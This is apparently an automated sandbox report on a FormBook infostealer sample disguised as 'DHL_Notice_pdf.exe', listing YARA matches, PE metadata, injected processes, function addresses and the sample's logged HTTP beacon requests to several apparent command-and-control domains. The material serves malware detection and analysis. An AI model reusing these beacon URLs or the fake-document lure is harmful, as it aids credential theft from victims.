          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: DHL_Notice_pdf.exe
          Source: initial sampleStatic PE information: Filename: DHL_Notice_pdf.exe
          Source: DHL_Notice_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_004208B71_2_004208B7
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_00420A261_2_00420A26
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004058433_2_00405843
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004018013_2_00401801
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004018033_2_00401803
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004018103_2_00401810
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004038C33_2_004038C3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004228C43_2_004228C4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004230E83_2_004230E8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004038B93_2_004038B9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0042219B3_2_0042219B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401A653_2_00401A65
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004222113_2_00422211
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00421A8C3_2_00421A8C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401BA03_2_00401BA0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004223BA3_2_004223BA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040561A3_2_0040561A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004206233_2_00420623
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004056233_2_00405623
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00422EAB3_2_00422EAB
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040BFEE3_2_0040BFEE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040BFF33_2_0040BFF3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00421F813_2_00421F81
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A03_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC20A83_2_00AC20A8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B0903_2_00A0B090
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC28EC3_2_00AC28EC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ACE8243_2_00ACE824
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A8303_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB10023_2_00AB1002
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A141203_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FF9003_2_009FF900
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC22AE3_2_00AC22AE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAFA2B3_2_00AAFA2B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B2363_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2EBB03_2_00A2EBB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E33_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB03DA3_2_00AB03DA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABDBD23_2_00ABDBD2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2ABD83_2_00A2ABD8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC2B283_2_00AC2B28
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A3093_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AB403_2_00A1AB40
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A9CB4F3_2_00A9CB4F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB44963_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0841F3_2_00A0841F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABD4663_2_00ABD466
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B4773_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A225813_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D823_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E03_2_00A0D5E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC25DD3_2_00AC25DD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC2D073_2_00AC2D07
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F0D203_2_009F0D20
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1D553_2_00AC1D55
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC2EF73_2_00AC2EF7
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A16E303_2_00A16E30
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABD6163_2_00ABD616
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1FF13_2_00AC1FF1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ACDFCE3_2_00ACDFCE
          Source: C:\Windows\explorer.exeCode function: 4_2_0B738F524_2_0B738F52
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737D424_2_0B737D42
          Source: C:\Windows\explorer.exeCode function: 4_2_0B735FA24_2_0B735FA2
          Source: C:\Windows\explorer.exeCode function: 4_2_0B734C724_2_0B734C72
          Source: C:\Windows\explorer.exeCode function: 4_2_0B7332794_2_0B733279
          Source: C:\Windows\explorer.exeCode function: 4_2_0B7372624_2_0B737262
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737E624_2_0B737E62
          Source: C:\Windows\explorer.exeCode function: 4_2_0B732C524_2_0B732C52
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737E5D4_2_0B737E5D
          Source: C:\Windows\explorer.exeCode function: 4_2_0B7382024_2_0B738202
          Source: C:\Windows\explorer.exeCode function: 4_2_0B7398024_2_0B739802
          Source: C:\Windows\explorer.exeCode function: 4_2_11944FA24_2_11944FA2
          Source: C:\Windows\explorer.exeCode function: 4_2_11947F524_2_11947F52
          Source: C:\Windows\explorer.exeCode function: 4_2_11946D424_2_11946D42
          Source: C:\Windows\explorer.exeCode function: 4_2_119472024_2_11947202
          Source: C:\Windows\explorer.exeCode function: 4_2_119488024_2_11948802
          Source: C:\Windows\explorer.exeCode function: 4_2_11941C524_2_11941C52
          Source: C:\Windows\explorer.exeCode function: 4_2_11946E5D4_2_11946E5D
          Source: C:\Windows\explorer.exeCode function: 4_2_11943C724_2_11943C72
          Source: C:\Windows\explorer.exeCode function: 4_2_119422794_2_11942279
          Source: C:\Windows\explorer.exeCode function: 4_2_119462624_2_11946262
          Source: C:\Windows\explorer.exeCode function: 4_2_11946E624_2_11946E62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AD4665_2_045AD466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F841F5_2_044F841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A44965_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B1D555_2_045B1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B2D075_2_045B2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E0D205_2_044E0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B25DD5_2_045B25DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FD5E05_2_044FD5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045125815_2_04512581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A2D825_2_045A2D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AD6165_2_045AD616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04506E305_2_04506E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B2EF75_2_045B2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045BDFCE5_2_045BDFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B1FF15_2_045B1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A10025_2_045A1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450A8305_2_0450A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045BE8245_2_045BE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B28EC5_2_045B28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FB0905_2_044FB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045120A05_2_045120A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B20A85_2_045B20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044EF9005_2_044EF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045041205_2_04504120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045099BF5_2_045099BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0459FA2B5_2_0459FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4AEF5_2_045A4AEF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B22AE5_2_045B22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450AB405_2_0450AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450A3095_2_0450A309
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B2B285_2_045B2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A03DA5_2_045A03DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045ADBD25_2_045ADBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451ABD85_2_0451ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045923E35_2_045923E3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451EBB05_2_0451EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C8D705_2_027C8D70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C3A505_2_027C3A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CA2005_2_027CA200
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E12F55_2_027E12F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C1AD05_2_027C1AD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E0AD15_2_027E0AD1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C1AC65_2_027C1AC6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E03A85_2_027E03A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C38305_2_027C3830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DE8305_2_027DE830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C38275_2_027C3827
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E10B85_2_027E10B8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CA1FB5_2_027CA1FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E018E5_2_027E018E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DFC995_2_027DFC99
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: String function: 009FB150 appears 136 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 044EB150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E533 NtCreateFile,3_2_0041E533
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E5E3 NtReadFile,3_2_0041E5E3
